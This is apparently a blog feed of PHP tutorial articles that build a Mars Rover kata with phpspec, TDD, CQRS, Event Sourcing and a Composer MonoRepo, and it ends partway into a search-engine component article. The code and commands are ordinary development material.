vendor/bin/phpspec describe 'MarsRover\Navigation\LandRoverHandler'
this should create the following
spec/MarsRover/Navigation/LandRoverHandlerSpec.php file:
<?php
namespace spec\MarsRover\Navigation;
use MarsRover\Navigation\LandRoverHandler;
use PhpSpec\ObjectBehavior;
use Prophecy\Argument;
class LandRoverHandlerSpec extends ObjectBehavior
{
function it_is_initializable()
{
$this->shouldHaveType(LandRoverHandler::class);
}
}
Event Sourcing is
all about recording significant actions. Landing a rover seems significant
enough, so that's what LandRoverHandler should do:
<?php
namespace spec\MarsRover\Navigation;
use MarsRover\Navigation\AnEventHappened;
use MarsRover\Navigation\Event;
use MarsRover\Navigation\EventStore;
use MarsRover\Navigation\LandRover;
use MarsRover\Navigation\Orientation;
use PhpSpec\ObjectBehavior;
class LandRoverHandlerSpec extends ObjectBehavior
{
const X = 23;
const Y = 42;
const ORIENTATION = Orientation::NORTH;
const EVENT_NAME = 'rover_landed';
const EVENT_DATA = [
'x' => self::X,
'y' => self::Y,
'orientation' => self::ORIENTATION,
];
function it_lands_a_rover_at_given_location(
AnEventHappened $anEventHappened,
Event $roverLanded,
EventStore $eventStore
) {
$this->beConstructedWith($anEventHappened, $eventStore);
$landRover = new LandRover(
self::X,
self::Y,
self::ORIENTATION
);
$anEventHappened->justNow(
self::EVENT_NAME,
self::EVENT_DATA
)->willReturn($roverLanded);
$eventStore->log($roverLanded)->shouldBeCalled();
$this->handle($landRover);
}
}
In this test, we rely on:
Event, a Data Transfer Object (DTO) that contains the name and the dataAnEventHappened, which is actually an Event factoryEventStore, a service responsible for "logging" EventsWe could have done without the factory and create directly Event in
LandRoverHandler, but then we'd have no way to check in our tests that it
was constructed with the right data.
Those classes don't exist yet, we've made them up to build a coherent story. Let's run the tests:
vendor/bin/phpspec run
They fail because of the missing classes... But phpspec bootstrapped them for us!
It created the src/MarsRover/Navigation/AnEventHappened.php file:
<?php
namespace MarsRover\Navigation;
interface AnEventHappened
{
public function justNow($argument1, $argument2);
}
It also created the src/MarsRover/Navigation/Event.php file:
<?php
namespace MarsRover\Navigation;
interface Event
{
}
And it created the src/MarsRover/Navigation/EventStore.php file:
<?php
namespace MarsRover\Navigation;
interface EventStore
{
public function log($argument1);
}
As we can see, when we reference a non existence class, phpspec generates an interface for us. It also generates methods, if we've described method calls in our test.
For now we'll leave them like this, and have a look at the generated
src/MarsRover/Navigation/LandRoverHandler.php file:
<?php
namespace MarsRover\Navigation;
class LandRoverHandler
{
private $anEventHappened;
private $eventStore;
public function __construct(AnEventHappened $anEventHappened, EventStore $eventStore)
{
$this->anEventHappened = $anEventHappened;
$this->eventStore = $eventStore;
}
public function handle(LandRover $landRover)
{
}
}
Thanks to the SpecGen extension, phpspec was able to detect Dependency Injection, and bootstrapped a constructor with an attribute initialization for us. How nice!
We'll just need to complete the handle method:
<?php
namespace MarsRover\Navigation;
class LandRoverHandler
{
const EVENT_NAME = 'rover_landed';
private $anEventHappened;
private $eventStore;
public function __construct(
AnEventHappened $anEventHappened,
EventStore $eventStore
) {
$this->anEventHappened = $anEventHappened;
$this->eventStore = $eventStore;
}
public function handle(LandRover $landRover)
{
$roverLanded = $this->anEventHappened->justNow(self::EVENT_NAME, [
'x' => $landRover->getCoordinates()->getX(),
'y' => $landRover->getCoordinates()->getY(),
'orientation' => $landRover->getOrientation()->get(),
]);
$this->eventStore->log($roverLanded);
}
}
Overall, the code looks very similar to the test. Let's run them:
vendor/bin/phpspec run
All green! We might want to use the same event name in both the code and the
test, so let's create a src/MarsRover/Navigation/Events.php file:
<?php
namespace MarsRover\Navigation;
class Events
{
const ROVER_LANDED = 'rover_landed';
}
Then use it in the code:
<?php
namespace MarsRover\Navigation;
class LandRoverHandler
{
private $anEventHappened;
private $eventStore;
public function __construct(
AnEventHappened $anEventHappened,
EventStore $eventStore
) {
$this->anEventHappened = $anEventHappened;
$this->eventStore = $eventStore;
}
public function handle(LandRover $landRover)
{
$roverLanded = $this->anEventHappened->justNow(Events::ROVER_LANDED, [
'x' => $landRover->getCoordinates()->getX(),
'y' => $landRover->getCoordinates()->getY(),
'orientation' => $landRover->getOrientation()->get(),
]);
$this->eventStore->log($roverLanded);
}
}
and finally in the test:
<?php
namespace spec\MarsRover\Navigation;
use MarsRover\Navigation\AnEventHappened;
use MarsRover\Navigation\Event;
use MarsRover\Navigation\Events;
use MarsRover\Navigation\EventStore;
use MarsRover\Navigation\LandRover;
use MarsRover\Navigation\Orientation;
use PhpSpec\ObjectBehavior;
class LandRoverHandlerSpec extends ObjectBehavior
{
const X = 23;
const Y = 42;
const ORIENTATION = Orientation::NORTH;
const EVENT_NAME = Events::ROVER_LANDED;
const EVENT_DATA = [
'x' => self::X,
'y' => self::Y,
'orientation' => self::ORIENTATION,
];
function it_lands_a_rover_at_given_location(
AnEventHappened $anEventHappened,
Event $roverLanded,
EventStore $eventStore
) {
$this->beConstructedWith($anEventHappened, $eventStore);
$landRover = new LandRover(
self::X,
self::Y,
self::ORIENTATION
);
$anEventHappened->justNow(
self::EVENT_NAME,
self::EVENT_DATA
)->willReturn($roverLanded);
$eventStore->log($roverLanded)->shouldBeCalled();
$this->handle($landRover);
}
}
We can run the tests one last time:
vendor/bin/phpspec run
Still green! We can commit our work:
git add -A
git commit -m '2: Created LandRoverHandler'
git checkout master
git merge --no-ff 2-landing
With Event Sourcing, the logic associated to our "Landing a Rover on Mars" use case is quite simple: we just record it as an event.
In the next article, we'll extract Event Sourcing logic from the navigation
package and put it in its own event-sourcing one.
Previously we've created a
navigation package, and in it
a LandRover class that
validates input parameters for our
first use case:
Mars Rovers need first to be landed at a given position. A position is composed of coordinates (
xandy, which are both integers) and an orientation (a string being one ofnorth,east,westorsouth).
We've also started to refactor it by extracting coordinates in their own class.
In this article we're going to further refactor LandRover:
cd packages/navigation
git checkout 2-landing
By having a look at LandRover, we can guess that it has 2 reasons to change:
x and y might become floats, or have an additional zThis hints toward two new classes, extracted from LandRover: Coordinates
and Orientation. In this article we'll take care of Orientation.
Let's start by bootstraping Orientation test class using
phpspec:
vendor/bin/phpspec describe 'MarsRover\Navigation\Orientation'
It should create the spec/MarsRover/Navigation/OrientationSpec.php file:
<?php
namespace spec\MarsRover\Navigation;
use MarsRover\Navigation\Orientation;
use PhpSpec\ObjectBehavior;
use Prophecy\Argument;
class OrientationSpec extends ObjectBehavior
{
function it_is_initializable()
{
$this->shouldHaveType(self::class);
}
}
Instead of reusing tests from LandRover, we'll try to describe all the
possible orientations:
<?php
namespace spec\MarsRover\Navigation;
use PhpSpec\ObjectBehavior;
class OrientationSpec extends ObjectBehavior
{
const NORTH = 'north';
const EAST = 'east';
const WEST = 'west';
const SOUTH = 'south';
function it_can_face_north()
{
$this->beConstructedWith(self::NORTH);
$this->get()->shouldBe(self::NORTH);
}
function it_can_face_east()
{
$this->beConstructedWith(self::EAST);
$this->get()->shouldBe(self::EAST);
}
function it_can_face_west()
{
$this->beConstructedWith(self::WEST);
$this->get()->shouldBe(self::WEST);
}
function it_can_face_south()
{
$this->beConstructedWith(self::SOUTH);
$this->get()->shouldBe(self::SOUTH);
}
function it_cannot_face_anywhere_else()
{
$this->beConstructedWith('Somehwere else');
$this
->shouldThrow(\InvalidArgumentException::class)
->duringInstantiation()
;
}
}
Now we can run the tests:
vendor/bin/phpspec run
They fail because src/MarsRover/Navigation/Orientation.php doesn't exist,
so phpspec bootstrapped it for us:
<?php
namespace MarsRover\Navigation;
class Orientation
{
private $argument;
public function __construct($argument)
{
$this->argument = $argument;
}
public function get()
{
}
}
We can edit it:
<?php
namespace MarsRover\Navigation;
class Orientation
{
const NORTH = 'north';
const EAST = 'east';
const WEST = 'west';
const SOUTH = 'south';
const ALLOWED_ORIENTATIONS = [
self::NORTH,
self::EAST,
self::WEST,
self::SOUTH,
];
private $orientation;
public function __construct($orientation)
{
if (false === in_array($orientation, self::ALLOWED_ORIENTATIONS, true)) {
throw new \InvalidArgumentException(
'Orientation must be one of: '
.implode(', ', self::ALLOWED_ORIENTATIONS)
);
}
$this->orientation = $orientation;
}
public function get() : string
{
return $this->orientation;
}
}
And run the tests:
vendor/bin/phpspec run
All green! It's important to note that tests should also be refactored.
We're going to use Orientation constants in the tests:
<?php
namespace spec\MarsRover\Navigation;
use MarsRover\Navigation\Orientation;
use PhpSpec\ObjectBehavior;
class OrientationSpec extends ObjectBehavior
{
function it_can_face_north()
{
$this->beConstructedWith(Orientation::NORTH);
$this->get()->shouldBe(Orientation::NORTH);
}
function it_can_face_east()
{
$this->beConstructedWith(Orientation::EAST);
$this->get()->shouldBe(Orientation::EAST);
}
function it_can_face_west()
{
$this->beConstructedWith(Orientation::WEST);
$this->get()->shouldBe(Orientation::WEST);
}
function it_can_face_south()
{
$this->beConstructedWith(Orientation::SOUTH);
$this->get()->shouldBe(Orientation::SOUTH);
}
function it_cannot_face_anywhere_else()
{
$this->beConstructedWith('Somehwere else');
$this
->shouldThrow(\InvalidArgumentException::class)
->duringInstantiation()
;
}
}
Running the tests again:
vendor/bin/phpspec run
Still green! We can now update LandRover tests to use Orientation:
<?php
namespace spec\MarsRover\Navigation;
use MarsRover\Navigation\Orientation;
use PhpSpec\ObjectBehavior;
class LandRoverSpec extends ObjectBehavior
{
const X = 23;
const Y = 42;
const ORIENTATION = Orientation::NORTH;
function it_has_coordinates()
{
$this->beConstructedWith(
self::X,
self::Y,
self::ORIENTATION
);
$coordinates = $this->getCoordinates();
$coordinates->getX()->shouldBe(self::X);
$coordinates->getY()->shouldBe(self::Y);
}
function it_has_an_orientation()
{
$this->beConstructedWith(
self::X,
self::Y,
self::ORIENTATION
);
$this->getOrientation()->get()->shouldBe(self::ORIENTATION);
}
}
We've removed orientation checking from LandRover tests, as we now trust
Orientation to do the job. Now We can use Orientation in LandRover:
<?php
namespace MarsRover\Navigation;
class LandRover
{
private $coordinates;
private $orientation;
public function __construct($x, $y, $orientation)
{
$this->coordinates = new Coordinates($x, $y);
$this->orientation = new Orientation($orientation);
}
public function getCoordinates() : Coordinates
{
return $this->coordinates;
}
public function getOrientation() : Orientation
{
return $this->orientation;
}
}
Let's run the tests:
vendor/bin/phpspec run
All green! We can now commit our work:
git add -A
git commit -m '2: Created Orientation'
Once again we've completed the full TDD cycle: first test, then code and finally refactor.
Before we started to extract Coordinates and Orientation, LandRover tests
were starting to get long and so we didn't bother to go too much into details.
This refactoring allowed us to get more confidence and add more testing cases.
phpspec has been really helpful by boostraping tests, and then when running the tests by bootstraping code: it makes the whole TDD cycle more natural. But it also allows us to have runnable self-checking specifications:
vendor/bin/phpspec run --format=pretty
This should now output:
MarsRover\Navigation\Coordinates
12 ✔ has x coordinate
22 ✔ cannot have non integer x coordinate
34 ✔ has y coordinate
44 ✔ cannot have non integer y coordinate
MarsRover\Navigation\LandRover
14 ✔ has coordinates
27 ✔ has an orientation
MarsRover\Navigation\Orientation
10 ✔ can face north
17 ✔ can face east
24 ✔ can face west
31 ✔ can face south
38 ✔ cannot face anywhere else
3 specs
11 examples (11 passed)
12ms
In the next article we'll create the actual landing logic, using Event Sourcing.
]]>Previously we've created a
navigation package, and in it
a LandRover class that
validates input parameters for our
first use case:
Mars Rovers need first to be landed at a given position. A position is composed of coordinates (
xandy, which are both integers) and an orientation (a string being one ofnorth,east,westorsouth).
In this article we're going to refactor LandRover:
cd packages/navigation
git checkout 2-landing
By having a look at LandRover, we can guess that it has 2 reasons to change:
x and y might become floats, or have an additional zThis hints toward two new classes, extracted from LandRover: Coordinates
and Orientation. In this article we'll take care of Coordinates.
First let's bootstrap the test class, using phpspec:
vendor/bin/phpspec describe 'MarsRover\Navigation\Coordinates'
This will create the spec/MarsRover/Navigation/CoordinatesSpec.php file:
<?php
namespace spec\MarsRover\Navigation;
use MarsRover\Navigation\Coordinates;
use PhpSpec\ObjectBehavior;
use Prophecy\Argument;
class CoordinatesSpec extends ObjectBehavior
{
function it_is_initializable()
{
$this->shouldHaveType(Coordinates::class);
}
}
We can edit it, by using what we've done in LandRover test class:
<?php
namespace spec\MarsRover\Navigation;
use PhpSpec\ObjectBehavior;
class CoordinatesSpec extends ObjectBehavior
{
const X = 23;
const Y = 42;
function it_has_x_coordinate()
{
$this->beConstructedWith(
self::X,
self::Y
);
$this->getX()->shouldBe(self::X);
}
function it_cannot_have_non_integer_x_coordinate()
{
$this->beConstructedWith(
'Nobody expects the Spanish Inquisition!',
self::Y
);
$this->shouldThrow(
\InvalidArgumentException::class
)->duringInstantiation();
}
function it_has_y_coordinate()
{
$this->beConstructedWith(
self::X,
self::Y
);
$this->getY()->shouldBe(self::Y);
}
function it_cannot_have_non_integer_y_coordinate()
{
$this->beConstructedWith(
self::X,
'No one expects the Spanish Inquisition!'
);
$this->shouldThrow(
\InvalidArgumentException::class
)->duringInstantiation();
}
}
If we run the tests now, it will bootsrap the Coordinates class:
vendor/bin/phpspec run
And it indeed created the src/MarsRover/Navigation/Coordinates.php file:
<?php
namespace MarsRover\Navigation;
class Coordinates
{
private $argument1;
private $argument2;
public function __construct($argument1, $argument2)
{
$this->argument1 = $argument1;
$this->argument2 = $argument2;
}
public function getX()
{
}
public function getY()
{
}
}
This leaves us with the task of completing it, reusing what's been done in
LandRover class:
<?php
namespace MarsRover\Navigation;
class Coordinates
{
private $x;
private $y;
public function __construct($x, $y)
{
if (false === is_int($x)) {
throw new \InvalidArgumentException(
'X coordinate must be an integer'
);
}
$this->x = $x;
if (false === is_int($y)) {
throw new \InvalidArgumentException(
'Y coordinate must be an integer'
);
}
$this->y = $y;
}
public function getX() : int
{
return $this->x;
}
public function getY() : int
{
return $this->y;
}
}
We can run the tests:
vendor/bin/phpspec run
All green! Now all we have to do is update LandRover test class to use
Coordinates:
<?php
namespace spec\MarsRover\Navigation;
use PhpSpec\ObjectBehavior;
class LandRoverSpec extends ObjectBehavior
{
const X = 23;
const Y = 42;
const ORIENTATION = 'north';
function it_has_coordinates()
{
$this->beConstructedWith(
self::X,
self::Y,
self::ORIENTATION
);
$coordinates = $this->getCoordinates();
$coordinates->getX()->shouldBe(self::X);
$coordinates->getY()->shouldBe(self::Y);
}
function it_has_an_orientation()
{
$this->beConstructedWith(
self::X,
self::Y,
self::ORIENTATION
);
$this->getOrientation()->shouldBe(self::ORIENTATION);
}
function it_cannot_have_a_non_cardinal_orientation()
{
$this->beConstructedWith(
self::X,
self::Y,
'A hareng!'
);
$this->shouldThrow(
\InvalidArgumentException::class
)->duringInstantiation();
}
}
We no longer need to check for invalid x and y values, as we trust
Coordinates to take care of them for us. We can now update LandRover class:
<?php
namespace MarsRover\Navigation;
class LandRover
{
const VALID_ORIENTATIONS = ['north', 'east', 'west', 'south'];
private $coordinates;
private $orientation;
public function __construct($x, $y, $orientation)
{
$this->coordinates = new Coordinates($x, $y);
if (false === in_array($orientation, self::VALID_ORIENTATIONS, true)) {
throw new \InvalidArgumentException(
'Orientation must be one of: '
.implode(', ', self::VALID_ORIENTATIONS)
);
}
$this->orientation = $orientation;
}
public function getCoordinates() : Coordinates
{
return $this->coordinates;
}
public function getOrientation() : string
{
return $this->orientation;
}
}
And that should make our test pass:
vendor/bin/phpspec run
All green! That's enough for us to commit our work:
git add -A
git commit -m '2: Created Coordinates'
We've followed the full cycle of TDD: test, code and refactor. Using phpspec has been really helpful as it bootstraped the test classes and then their code classes for us.
In the next article, we'll extract Orientation from LandRover.
Previously we've created a navigation package, we can now start developing the first use case:
Mars Rovers need first to be landed at a given position. A position is composed of coordinates (
xandy, which are both integers) and an orientation (a string being one ofnorth,east,westorsouth).
The Command Bus design pattern is composed of 3 classes:
Command class which validates use case input and with a name that
communicates imperative intention (e.g. LandRover)CommandHandler,
which does the actual logic for the use caseCommandBus that takes a Command and executes the appropriate
CommandHandler, and that allows for middlewaresWe're going to twist this design pattern for the Mars Rover by omiting the
CommandBus class, as we don't really need middlewares or to find the
appropriate CommandHandler for a given Command.
Let's start by creating the Command class that'll take care of the input
parameter validation:
cd packages/navigation
git checkout -b 2-landing
We're going to bootstrap the test class for LandRover, using
phpspec:
vendor/bin/phpspec describe 'MarsRover\Navigation\LandRover'
This should generate this spec/MarsRover/Navigation/LandRoverSpec.php class:
<?php
namespace spec\MarsRover\Navigation;
use MarsRover\Navigation\LandRover;
use PhpSpec\ObjectBehavior;
use Prophecy\Argument;
class LandRoverSpec extends ObjectBehavior
{
function it_is_initializable()
{
$this->shouldHaveType(LandRover::class);
}
}
This leaves us the task of editing it to start describing input parameters:
<?php
namespace spec\MarsRover\Navigation;
use PhpSpec\ObjectBehavior;
class LandRoverSpec extends ObjectBehavior
{
const X = 23;
const Y = 42;
const ORIENTATION = 'north';
function it_has_x_coordinate()
{
$this->beConstructedWith(
self::X,
self::Y,
self::ORIENTATION
);
$this->getX()->shouldBe(self::X);
}
function it_has_y_coordinate()
{
$this->beConstructedWith(
self::X,
self::Y,
self::ORIENTATION
);
$this->getY()->shouldBe(self::Y);
}
function it_has_an_orientation()
{
$this->beConstructedWith(
self::X,
self::Y,
self::ORIENTATION
);
$this->getOrientation()->shouldBe(self::ORIENTATION);
}
}
We can now run the tests:
vendor/bin/phpspec run
This will generate the src/MarsRover/Navigation/LandRover.php file:
<?php
namespace MarsRover\Navigation;
class LandRover
{
private $argument1;
private $argument2;
private $argument3;
public function __construct($argument1, $argument2, $argument3)
{
$this->argument1 = $argument1;
$this->argument2 = $argument2;
$this->argument3 = $argument3;
}
public function getX()
{
}
public function getY()
{
}
public function getOrientation()
{
}
}
All we need to do is to edit it:
<?php
namespace MarsRover\Navigation;
class LandRover
{
private $x;
private $y;
private $orientation;
public function __construct($x, $y, $orientation)
{
$this->x = $x;
$this->y = $y;
$this->orientation = $orientation;
}
public function getX() : int
{
return $this->x;
}
public function getY() : int
{
return $this->y;
}
public function getOrientation() : string
{
return $this->orientation;
}
}
Let's run the tests again:
vendor/bin/phpspec run
All green! But our job isn't finished yet, we haven't described invalid input parameters:
<?php
namespace spec\MarsRover\Navigation;
use PhpSpec\ObjectBehavior;
class LandRoverSpec extends ObjectBehavior
{
const X = 23;
const Y = 42;
const ORIENTATION = 'north';
function it_has_x_coordinate()
{
$this->beConstructedWith(
self::X,
self::Y,
self::ORIENTATION
);
$this->getX()->shouldBe(self::X);
}
function it_cannot_have_non_integer_x_coordinate()
{
$this->beConstructedWith(
'Nobody expects the Spanish Inquisition!',
self::Y,
self::ORIENTATION
);
$this->shouldThrow(
\InvalidArgumentException::class
)->duringInstantiation();
}
function it_has_y_coordinate()
{
$this->beConstructedWith(
self::X,
self::Y,
self::ORIENTATION
);
$this->getY()->shouldBe(self::Y);
}
function it_cannot_have_non_integer_y_coordinate()
{
$this->beConstructedWith(
self::X,
'No one expects the Spanish Inquisition!',
self::ORIENTATION
);
$this->shouldThrow(
\InvalidArgumentException::class
)->duringInstantiation();
}
function it_has_an_orientation()
{
$this->beConstructedWith(
self::X,
self::Y,
self::ORIENTATION
);
$this->getOrientation()->shouldBe(self::ORIENTATION);
}
function it_cannot_have_a_non_cardinal_orientation()
{
$this->beConstructedWith(
self::X,
self::Y,
'A hareng!'
);
$this->shouldThrow(
\InvalidArgumentException::class
)->duringInstantiation();
}
}
Running the tests again:
vendor/bin/phpspec run
They fail, because we need to check input parameters:
<?php
namespace MarsRover\Navigation;
class LandRover
{
const VALID_ORIENTATIONS = ['north', 'east', 'west', 'south'];
private $x;
private $y;
private $orientation;
public function __construct($x, $y, $orientation)
{
if (false === is_int($x)) {
throw new \InvalidArgumentException(
'X coordinate must be an integer'
);
}
$this->x = $x;
if (false === is_int($y)) {
throw new \InvalidArgumentException(
'Y coordinate must be an integer'
);
}
$this->y = $y;
if (false === in_array($orientation, self::VALID_ORIENTATIONS, true)) {
throw new \InvalidArgumentException(
'Orientation must be one of: '
.implode(', ', self::VALID_ORIENTATIONS)
);
}
$this->orientation = $orientation;
}
public function getX() : int
{
return $this->x;
}
public function getY() : int
{
return $this->y;
}
public function getOrientation() : string
{
return $this->orientation;
}
}
Let's run the tests again:
vendor/bin/phpspec run
All green! We can now commit our work:
git add -A
git commit -m '2: Created LandRover'
We've followed the first steps of TDD: write a test then write the code.
Using phpspec makes this process easier as the code gets bootstrapped for us once we've written the test.
Since we write those tests first, in a descriptive way (test method names are sentences), we can use them as runnable self-checking specifications! phpspec allows us to display them explicitly:
vendor/bin/phpspec run --format=pretty
This should display:
MarsRover\Navigation\LandRover
13 ✔ has x coordinate
24 ✔ cannot have non integer x coordinate
37 ✔ has y coordinate
48 ✔ cannot have non integer y coordinate
61 ✔ has an orientation
72 ✔ cannot have a non cardinal orientation
1 specs
6 examples (6 passed)
10ms
Note:
navigationtests can also be run from the MonoRepo:cd ../../ composer update --optimize-autoloader vendor/bin/phpspec run
In the next article we'll complete the TDD cycle by refactoring LandRover:
we'll extract x and y coordinates into their own class.
But first, we need to initialize our project.
Let's start by creating a new git repository:
mkdir rover
cd rover
git init
Since we're going to use Composer, we can create
a composer.json file:
{
"name": "mars-rover/mars-rover",
"license": "MIT",
"type": "project",
"description": "Mars Rover",
"require": {
"php": "^7.0"
}
}
We're then going to ignore some third party library related stuff by
creating .gitignore:
# Third Party libraries
/vendor/
With this we've finished creating our repository. We can run composer:
composer install --optimize-autoloader
That should be enough for a first commit:
git add composer.json .gitignore
git commit -m '0: Created project'
navigation packageBy having a look at the use cases, we can see that there's going to be "write-only" dedicated ones and "read-only" dedicated ones:
Since we'd like to follow the CQRS principle, we'll put the "write-only"
logic in a different package than the "read-only" logic. Landing and Driving
is all about navigation, so we'll create a navigation package:
git checkout -b 1-navigation
mkdir -p packages/navigation
cd packages/navigation
Composer needs us to set up the package by creating a composer.json file:
{
"name": "mars-rover/navigation",
"license": "MIT",
"type": "library",
"description": "Mars Rover - Navigation",
"autoload": {
"psr-4": { "MarsRover\\Navigation\\": "src/MarsRover/Navigation" }
},
"require": {
"php": "^7.0"
},
"require-dev": {
"memio/spec-gen": "^0.6"
}
}
We've decided to use phpspec as a test framework, and
to get the most of it we'd like to use its SpecGen
extension. To do so we need to create the phpspec.yml.dist file:
extensions:
Memio\SpecGen\MemioSpecGenExtension: ~
Note: For more information about phpspec see this article.
Finally, we can configure this package's git by creating a .gitignore file:
# Configuration
/phpspec.yml
# Third Party libraries
/vendor/
/composer.lock
With this we've finished creating our package. We can run Composer:
composer install --optimize-autoloader
That should be enough for a second commit:
git add -A
git commit -m '1: Created Navigation package'
navigation to the projectLet's go back to the project's root:
cd ../../
One benefit of MonoRepos is to be able to run all packages tests in one
command. To do so, we need to require navigation in our project's
composer.json file:
{
"name": "mars-rover/mars-rover",
"license": "MIT",
"type": "project",
"description": "Mars Rover",
"repositories": [
{
"type": "path",
"url": "./packages/*"
}
],
"require": {
"mars-rover/navigation": "*@dev",
"php": "^7.0"
}
}
By default, Composer looks for packages only in Packagist.
By adding the new repositories section we can tell it to also check locally
in ./packages, allowing us to add them in the require section.
Composer needs us to tell it what version of the package we'd like, but in
MonoRepos all packages share the same version, so we simply use * (any).
But to be able to use the latest changes, and not only the tagged one, we
have to specify the development stability (@dev).
Since we've decided to use phpspec for our test, we're also going to need to require it in the project's development dependencies:
composer require --dev phpspec/phpspec:^3.0
By default phpspec is going to look for test in the project's root. We need to
create a phpspec.yml.dist file to tell it to use navigation's ones:
suites:
navigation:
namespace: 'MarsRover\Navigation'
src_path: packages/navigation/src
spec_path: packages/navigation
We'll also update .gitignore to ignore local configuration:
# Configuration
/phpspec.yml
# Third Party libraries
/vendor/
And that's it! We are now able to run Composer and then phpspec:
composer update --optimize-autoloader
./vendor/bin/phpspec run
That should be enough for a last commit:
git add -A
git commit -m '1: Added navigation package to main project'
Let's merge it to master:
git checkout master
git merge --no-ff 1-navigation
With Composer we can create many packages inside a single repository. With this MonoRepo, we can then execute all the tests in one command.
In the next article we'll tackle down the "Landing a Rover on Mars" use case, allowing us to showcase an example of Event Sourcing and TDD.
]]>In this introductory article, we're simply going to describe our Mars Rover specifications.
Note: This programming exercise originally comes from Dallas Hack Club, which is now unfortunately down.
This Mars Rover kata has been adapted for the needs of this series.
But first, let's have a quick reminder on what the practices mentioned above are.
A MonoRepo is a single versioning repository containing many packages that would otherwise be versioned in their own repositories.
With it, everything can be found in one place, which makes it easy to:
However it also brings the following disadvantages:
MonoRepos make sense for projects that would be packaged / released together (although it makes it possible to package / release them independently).
Note: Here are some references about MonoRepos:
CQRS is about separating "write" logic from "read" logic, and it can be applied on many levels, for example:
It's important to note that CQRS can also be applied partially in the same project: use it only when it makes sense.
Note: Here are some references about CQRS:
With ES, every significant action is recorded as an "event". Keeping track of those events provides the following advantages:
Just like with CQRS, it's important to note that ES can also be applied partially inside a project : use it only when it makes sense.
ES is often associated to CQRS, but they can be used separately.
Note: Here are some references about ES:
TDD can be summed up in the following steps when developing:
Writing the test before the code forces us to think about how we'd like the future code to be used. It's like writing specifications, but with 3 purposes: design, documentation and automated regression checking.
This discipline makes it easy to have a high code coverage (although rigour still needs to be applied: we need to test all the happy paths and all the unhappy ones).
Note: Here are some references about TDD:
The purpose of this series is to create the software of a Mars Rover, according to the following specifications.
Mars Rovers need first to be landed at a given position. A position is composed
of coordinates (x and y, which are both integers) and an orientation
(a string being one of north, east, west or south).
It is then possible to drive them, using instructions such as move_forward
(keeps orientation, but moves along the x or y axis) or
turn_left / turn_right (keeps the same coordinates, but changes the
orientation).
From time to time, they'll be requested to give their current location
(again, x and y coordinates and the orientation).
For example, a rover can be landed at 23, 42, north and then can be
instructed to move forward twice, then to turn left, then to move forward once.
When requested to, it should provide this location: 22, 44, west.
From the above specifications, we can identify at least three use cases:
In the next article we'll initialize the project by creating the MonoRepo and
its first package: navigation.
]]>Note We'll be using:
- PHP 7
- Composer
- git
- phpspec and its SpecGen extension
TL;DR: A Search Engine component can help you get the CQRS "Query" part right.
The Command / Query Responsibility Segregation (CQRS) principle states that "write" and "read" logic should be separated. For example a single "Publisher" server (write) with many "Subscribers" servers (read) is a macro example of applying this principle, and an API that defines a read endpoint free from write side effects is a micro example of applying it.
Because it's hard to go from a regular mindset to a CQRS one, we've seen in the last article how we can use the Command Bus pattern to help us get the Command part right.
The "Query" equivalent of the Command Bus would be the Repository design pattern.
Note: Here's some nice articles about this pattern:
However repositories can grow into an object containing many methods like
findByName, findAllInDescendingOrder, findByNameInDescendingOrder, etc.
To avoid this, we can combine it with the Specification design pattern:
our Repository would only have one single search method taking a Criteria object
that describes our query parameters.
Note: For more articles on the topic, see:
In this article, we'll build a private "Search Engine" component to help us get the Query part right.
All projects are different, and while the feature described here might have some similarity with other projects requirements, there's a big chance that creating a single common library might prove too hard.
So instead we'll create a "private" Component for our project: it's going to be decoupled, allowing it to become a library on its own just in the unlikely event it turns out to be the "Universal Search Engine Component".
Our requirements will be the following: we need to create an endpoint that allows us to search "profiles", with the following features:
1, default number of profiles per page = 10)name, default direction = ASC)Here's a HTTP Request example:
GET /v1/profiles?name=marvin&page=42&per_page=23&sort=-name HTTP/1.1
Accept: application/json
Note:
sort's value can be eithername(the default) or-name(changes the direction to be descending).
And here's a HTTP Response example:
HTTP/1.1 200 OK
Content-Type: application/json
{
"items": [
{
"name": "Arthur Dent"
},
{
"name": "Ford Prefect"
},
{
"name": "Trillian Astra"
}
],
"page": {
"current_page": 1,
"per_page": 10,
"total_elements": 3,
"total_pages": 1
}
}
In order to satisfy the above requirements, we need to create a flexible Search Engine component that can accept any of those parameters. That can be done in one interface and a few (4) value objects.
First, we can have a SearchEngine interface:
<?php
namespace AppBundle\Search;
use Porpaginas\Result;
interface SearchEngine
{
public function match(Criteria $criteria) : Result;
}
Note: We're using porpaginas, a library that makes paginated result a breeze to handle. Find out more about it here.
A Criteria is a value object, composed of:
profile)Paginating value objectOrdering value objectFiltering value objectIt can be constructed using the query parameters:
<?php
namespace AppBundle\Search;
use AppBundle\Search\Criteria\Filtering;
use AppBundle\Search\Criteria\Ordering;
use AppBundle\Search\Criteria\Paginating;
class Criteria
{
public $resourceName;
public $filtering;
public $ordering;
public $paginating;
public function __construct(
string $resourceName,
Filtering $filtering,
Ordering $ordering,
Paginating $paginating
) {
$this->resourceName = $resourceName;
$this->filtering = $filtering;
$this->ordering = $ordering;
$this->paginating = $paginating;
}
public static function fromQueryParameters(string $resourceName, array $queryParameters) : self
{
return new self(
$resourceName,
Filtering::fromQueryParameters($queryParameters),
Ordering::fromQueryParameters($queryParameters),
Paginating::fromQueryParameters($queryParameters)
);
}
}
The Paginating value object takes care of the page parameter (e.g. 1) and
the per_page parameter (e.g. 10):
<?php
namespace AppBundle\Search\Criteria;
class Paginating
{
const DEFAULT_CURRENT_PAGE = 1;
const DEFAULT_ITEMS_PER_PAGE = 10;
public $currentPage;
public $itemsPerPage;
public $offset;
public function __construct(int $currentPage, int $itemsPerPage)
{
$this->currentPage = $currentPage;
if ($this->currentPage <= 0) {
$this->currentPage = self::DEFAULT_CURRENT_PAGE;
}
$this->itemsPerPage = $itemsPerPage;
if ($this->itemsPerPage <= 0) {
$this->itemsPerPage = self::DEFAULT_ITEMS_PER_PAGE;
}
$this->offset = $this->currentPage * $this->itemsPerPage - $this->itemsPerPage;
}
public static function fromQueryParameters(array $queryParameters) : self
{
$currentPage = $queryParameters['page'] ?? self::DEFAULT_CURRENT_PAGE;
$maximumResults = $queryParameters['per_page'] ?? self::DEFAULT_ITEMS_PER_PAGE;
return new self($currentPage, $maximumResults);
}
}
The Ordering value object takes care of the sort parameter (e.g. -name):
<?php
namespace AppBundle\Search\Criteria;
class Ordering
{
const DEFAULT_FIELD = 'name';
const DEFAULT_DIRECTION = 'ASC';
public $field;
public $direction;
public function __construct(string $field, string $direction)
{
$this->field = $field;
$this->direction = $direction;
}
public static function fromQueryParameters(array $queryParameters) : self
{
$column = $queryParameters['sort'] ?? self::DEFAULT_FIELD;
